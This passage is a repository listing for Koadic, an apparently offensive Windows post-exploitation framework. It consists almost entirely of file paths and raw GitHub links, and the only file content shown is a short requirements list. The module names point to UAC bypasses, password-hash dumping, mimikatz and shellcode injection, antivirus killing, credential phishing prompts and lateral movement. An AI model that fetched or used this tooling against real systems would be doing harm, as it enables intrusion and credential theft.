https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/js/stage.js -------------------------------------------------------------------------------- /data/stager/js/stdlib.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/js/stdlib.js -------------------------------------------------------------------------------- /data/stager/vbscript/disk.cmd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/vbscript/disk.cmd -------------------------------------------------------------------------------- /data/stager/vbscript/mshta.cmd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/vbscript/mshta.cmd -------------------------------------------------------------------------------- /data/stager/vbscript/stdlib.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/vbscript/stdlib.vbs -------------------------------------------------------------------------------- /data/stager/vbscript/work.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/data/stager/vbscript/work.vbs -------------------------------------------------------------------------------- /koadic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/koadic -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_eventvwr.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/elevate/bypassuac_eventvwr.py -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_sdclt.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/elevate/bypassuac_sdclt.py -------------------------------------------------------------------------------- /modules/implant/fun/cranberry.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/fun/cranberry.py -------------------------------------------------------------------------------- /modules/implant/fun/voice.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/fun/voice.py -------------------------------------------------------------------------------- /modules/implant/gather/clipboard.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/gather/clipboard.py -------------------------------------------------------------------------------- /modules/implant/gather/enum_printers.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/gather/enum_printers.py -------------------------------------------------------------------------------- /modules/implant/gather/enum_shares.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/gather/enum_shares.py -------------------------------------------------------------------------------- /modules/implant/gather/enum_users.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/gather/enum_users.py -------------------------------------------------------------------------------- /modules/implant/gather/hashdump_dc.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/gather/hashdump_dc.py -------------------------------------------------------------------------------- /modules/implant/gather/hashdump_sam.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/gather/hashdump_sam.py -------------------------------------------------------------------------------- /modules/implant/gather/office_key.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/gather/office_key.py -------------------------------------------------------------------------------- /modules/implant/gather/windows_key.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/gather/windows_key.py -------------------------------------------------------------------------------- /modules/implant/inject/mimikatz_dotnet2js.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/inject/mimikatz_dotnet2js.py -------------------------------------------------------------------------------- /modules/implant/inject/mimikatz_dynwrapx.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/inject/mimikatz_dynwrapx.py -------------------------------------------------------------------------------- /modules/implant/inject/reflectdll_excel.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/inject/reflectdll_excel.py -------------------------------------------------------------------------------- /modules/implant/inject/shellcode_dynwrapx.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/inject/shellcode_dynwrapx.py -------------------------------------------------------------------------------- /modules/implant/inject/shellcode_excel.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/inject/shellcode_excel.py -------------------------------------------------------------------------------- /modules/implant/manage/enable_rdesktop.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/manage/enable_rdesktop.py -------------------------------------------------------------------------------- /modules/implant/manage/exec_cmd.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/manage/exec_cmd.py -------------------------------------------------------------------------------- /modules/implant/manage/killav.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/manage/killav.py -------------------------------------------------------------------------------- /modules/implant/phish/password_box.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/phish/password_box.py -------------------------------------------------------------------------------- /modules/implant/pivot/exec_psexec.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/pivot/exec_psexec.py -------------------------------------------------------------------------------- /modules/implant/pivot/exec_wmi.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/pivot/exec_wmi.py -------------------------------------------------------------------------------- /modules/implant/pivot/exec_wmic.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/pivot/exec_wmic.py -------------------------------------------------------------------------------- /modules/implant/pivot/stage_wmi.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/pivot/stage_wmi.py -------------------------------------------------------------------------------- /modules/implant/scan/tcp.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/scan/tcp.py -------------------------------------------------------------------------------- /modules/implant/util/download_file.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/util/download_file.py -------------------------------------------------------------------------------- /modules/implant/util/upload_file.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/implant/util/upload_file.py -------------------------------------------------------------------------------- /modules/stager/js/disk.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/stager/js/disk.py -------------------------------------------------------------------------------- /modules/stager/js/mshta.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/stager/js/mshta.py -------------------------------------------------------------------------------- /modules/stager/js/regsvr.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/stager/js/regsvr.py -------------------------------------------------------------------------------- /modules/stager/js/rundll32_js.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/stager/js/rundll32_js.py -------------------------------------------------------------------------------- /modules/stager/jscript.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/stager/jscript.py -------------------------------------------------------------------------------- /modules/stager/powershell.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/stager/powershell.py -------------------------------------------------------------------------------- /modules/stager/vbscript.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jimywork/koadic/HEAD/modules/stager/vbscript.py -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | impacket 2 | pycrypto 3 | pyasn1 4 | --------------------------------------------------------------------------------